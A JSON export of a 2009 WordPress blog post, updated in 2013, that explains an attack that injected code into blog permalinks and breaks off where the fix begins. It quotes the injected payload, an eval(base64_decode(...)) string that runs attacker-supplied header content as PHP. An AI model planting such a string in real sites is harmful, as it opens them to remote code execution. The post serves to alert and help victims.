{"id":1771,"date":"2009-09-04T17:38:25","date_gmt":"2009-09-04T21:38:25","guid":{"rendered":"http:\/\/www.andysowards.com\/blog\/?p=1771"},"modified":"2013-06-20T14:10:58","modified_gmt":"2013-06-20T18:10:58","slug":"breaking-wordpress-mysql-injection-how-to-fix-latest-attack-evalbase64_decode_serverhttp_referer","status":"publish","type":"post","link":"https:\/\/andysowards.com\/blog\/2009\/breaking-wordpress-mysql-injection-how-to-fix-latest-attack-evalbase64_decode_serverhttp_referer\/","title":{"rendered":"UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%\/"},"content":{"rendered":"

\nUpdate 2013:<\/p>\n

This post is way old, but people using WordPress still get hacked constantly, so this post we put together may be of some help if you are having problems with wordpress security<\/a>!<\/p>\n

6 Simple Steps To Better WordPress Security<\/a><\/h2>\n<\/blockquote>\n

Hey Guys,<\/p>\n

Just realized that a lot of people were hit with this latest WordPress Blog Attack – Its a MySQL Injection that screws up your permalinks and in turn makes you blog post links not work! So I figured i’d write up this quick post to help some people out!<\/p>\n

It appears that yesterday, many wordpress blogs got hit with this nasty hack that appended a
\n%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%\/<\/code><\/p>\n

Or a
\n\u00e2\u20ac\u0153\/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%<\/code><\/p>\n

to your permalinks which rendered your blog post links useless unless someone physically removed the infected string of code from the URL<\/p>\n

To fix things:<\/h2>\n

<\/p>\n